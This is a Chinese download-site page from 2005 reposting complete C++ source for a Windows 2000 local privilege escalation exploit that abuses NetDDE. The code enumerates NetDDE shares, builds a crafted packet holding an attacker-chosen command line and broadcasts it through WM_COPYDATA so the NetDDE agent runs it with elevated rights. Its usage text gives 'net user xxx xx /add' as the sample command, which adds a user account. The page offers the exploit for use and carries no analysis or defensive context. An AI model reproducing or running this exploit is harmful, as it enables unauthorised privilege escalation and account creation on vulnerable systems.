|
|
|
|
w2k本地溢出netddemsg源码 |
|
|
|
作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站 |
<![CDATA[// netddemsg.cpp : Defines the entry point for the application.
// To link include library nddeapi.lib
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include<nddeapi.h>
char mess[300];
void OutPutString(char *str)
{
printf("%s\r\n",str);
}
void NDDEError(UINT err)
{
char error[256];
NDdeGetErrorString(err,error,256);
OutPutString(error);
// exit(err);
}
void *BuildNetDDEPacket(const char *svShareName, const char* svCmdLine, int *pBufLen)
{
// Build NetDDE message
int cmdlinelen=strlen(svCmdLine);
int funkylen=0x18+strlen(svShareName)+1+cmdlinelen+1;
char *funky=(char *)malloc(funkylen);
if(funky==NULL)
{
OutPutString("Out of memory.");
return NULL;
}
// 0xDDE1DDE1(magic number) 0x00000001 (?) 0x00000001 (?) // ShareModId unused (?)
char magic[0x20]="\xE1\xDD\xE1\xDD\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x09\x00\x00\x00\x01\xCC\xCC\xCC\xCC\x0";
memcpy(funky, magic, 0x18);
memcpy(funky+0x18,svShareName,strlen(svShareName)+1); // Share name
memcpy(funky+0x18+strlen(svShareName)+1,svCmdLine,cmdlinelen+1); // Command line to execute
*pBufLen=funkylen;
return funky;
}
void Usage(char *file)
{
_snprintf(mess, 300, "Syntax is: %s [-s sharename] <\"command line\">\r\n", file);
OutPutString(mess);
_snprintf(mess, 300, "\t if the command line contain BLANK, use \" \" to include it,\r\n \t for ex: %s \"net user xxx xx /add\"\r\n", file);
OutPutString(mess);
OutPutString("\t /? or NO parameter show this.");
exit(0);
}
int main(int argc, char *argv[])
{
// Check command line
int cmdlinelen;
if(argc<=1 || !stricmp(argv[1], "/?"))Usage(argv[0]);
char *lpCmdLine=argv[1];
cmdlinelen=strlen(lpCmdLine);
char *szShare=NULL;
char *szCmdLine;
int cmdNo=1;
if(strncmp(lpCmdLine,"-s",2)==0)
{
if(argc<3)
{
OutPutString("You must specify a share after '-s'!");
return -1;
}
szShare=argv[2];
cmdNo=3;
}
if(argc<cmdNo+1)
{
OutPutString("You must specify a command to run.");
return -1;
}
szCmdLine=argv[cmdNo];
// Get NetDDE Window
HWND hwnd=FindWindow("NDDEAgnt","NetDDE Agent");
if(hwnd==NULL)
{
_snprintf(mess, 300, "Couldn't find NetDDE agent window, error code:%d\r\n", GetLastError());
OutPutString(mess);
// return -1;
}
// Get computer name
DWORD dwSize=256;
char svCompName[256];
GetComputerName(svCompName,&dwSize);
// Get list of shares to try
char *sharename,*sharenames;
if(szShare==NULL)
{
// Try all shares
UINT err;
DWORD dwNumShares;
// deep check otgpdvt
err=NDdeShareEnum(svCompName,0,NULL,0,&dwNumShares,&dwSize);
if(err!=NDDE_NO_ERROR && err!=NDDE_BUF_TOO_SMALL)NDDEError(err);
sharenames=(char *)malloc(dwSize);
err=NDdeShareEnum(svCompName,0,(LPBYTE)sharenames,dwSize,&dwNumShares,&dwSize);
if(err!=NDDE_NO_ERROR)NDDEError(err);
}
else{
// Try command line share
sharenames=(char *)malloc(strlen(szShare)+2);
memset(sharenames,'\0',strlen(szShare)+2);
strcpy(sharenames,szShare);
}
// Try all shares
for(sharename=sharenames;(*sharename)!='\0'; sharename+=(strlen(sharename)+1))
{
// Tell user
if(szShare==NULL)
{
_snprintf(mess ,300 ,"Try command through the '%s' share?",sharename);
OutPutString(mess);
}
// Get NetDDE packet
void *funky;
int funkylen;
funky=BuildNetDDEPacket(sharename, szCmdLine, &funkylen);
if(funky==NULL)return -1;
// Perform CopyData
COPYDATASTRUCT cds;
cds.cbData=funkylen;
cds.dwData=0;
cds.lpData=(PVOID)funky;
SendMessage(HWND_BROADCAST,WM_COPYDATA,(WPARAM)hwnd,(LPARAM)&cds);
//break;
// Free memory
free(funky);
}
// Free memory
free(sharenames);
return 0;
}
]]>
|
|
相关文章:相关软件: |
|
本类阅读TOP10